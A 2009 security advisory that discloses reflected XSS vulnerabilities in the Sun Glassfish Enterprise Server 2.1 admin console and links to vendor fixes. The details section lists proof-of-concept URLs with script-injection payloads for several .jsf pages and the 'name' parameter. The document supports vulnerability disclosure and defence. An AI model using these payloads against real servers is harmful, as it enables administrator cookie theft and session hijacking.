Services Vulnerabilities Exploits Publications News About DSecRG

[DSECRG-09-034] Sun Glassfish Enterprise Server - Multiple Linked XSS vulnerabilies Glassfish Enterprise Server Admin Console has multiple linked XSS vulnerabilities. Application: Sun Glassfish Enterprise Server Versions Affected: 2.1 Vendor URL: https://glassfish.dev.java.net/ Bug: Multiple Linked XSS Vulnerabilities Exploits: YES Reported: 19.03.2009 Vendor response: 20.03.2009 Solution: YES Date of Public Advisory: 05.05.2009 Author: Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) Details ******* Using this vulnerability an attacker can steal administrator's cookie and then authenticate as administrator or perform certain administrative actions. 1. Multiple Linked XSS vulnerabilities. Many pages have typical XSS vulnerability. An attacker can inject XSS in URL string. Example: http://[server]/applications/applications.jsf?');};alert("DSecRG_XSS");</script><!-- http://[server]/configuration/configuration.jsf?');};alert("DSecRG_XSS");</script><!-- http://[server]/customMBeans/customMBeans.jsf?');};alert("DSecRG_XSS");</script><!-- http://[server]/resourceNode/resources.jsf?');};alert("DSecRG_XSS");</script><!-- http://[server]/sysnet/registration.jsf?');};alert("DSecRG_XSS");</script><!-- http://[server]/webService/webServicesGeneral.jsf?');};alert("DSecRG_XSS");</script><!-- Response HTML Code: ------------------- ################################################# ... <script type="text/javascript"> var myonload = new Object(); myonload.oldonload = window.onload; myonload.newonload = function() { if ('/applications/applications.jsf?');};alert("DSecRG_XSS");</script><!--' != '') { ... ################################################# 2. Multiple Linked XSS vulnerabilities in GET parameter "name". Many pages have typical XSS vulnerability in GET parameter "name". An attacker can inject XSS in URL string. Example: http://[server]/configuration/auditModuleEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')> http://[server]/configuration/httpListenerEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')>&configName=server-config http://[server]/resourceNode/jdbcResourceEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')> Solution ******** These security vulnerabilities are fixed in CVS. The following links is to be used for all the changes fixing these issues: https://glassfish.dev.java.net/servlets/ReadMsg?list=cvs&msgNo=29669 https://glassfish.dev.java.net/servlets/ReadMsg?list=cvs&msgNo=29668 https://glassfish.dev.java.net/servlets/ReadMsg?list=cvs&msgNo=29675 Credits ******* http://www.nabble.com/Re:--DSECRG--Sun-Glassfish-Multiple-Security-Vulnerabilities-p23002524.html About ***** Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com http://www.dsec.ru

Vulnerabilities RSS 04.02.2010 [DSECRG-09-065] TuvNetworks TVUPlayer ActiveX component - Insecure method 11.01.2010 [DSECRG-09-011] HP StorageWorks 1/8 G2 Tape Autoloader - privilege escalation, DOS 16.11.2009 [DSECRG-09-062] Alteon OS BBI (Nortel) - Multiple Vulnerabilities 26.10.2009 [DSECRG-09-010] Oracle Database 10G CTXSYS.DRVXTABX - PLSQL Injection 07.10.2009 [DSECRG-09-017] SAP GUI vsflexGrid ActiveX - Buffer Overflow vulnerability 07.10.2009 [DSECRG-09-048] HP LaserJet printers - Multiple Stored XSS (Script injection) vulnerabilities Vulnerabilities list

		© 2002—2010, Digital Security For quoting or using materials from this site link is obligatory +7 (812) 703-1547, +7 (812) 430-9130    e-mail: research@dsecrg.com Rss: Vulnerabilities, Exploits, News, Publications, Summary Search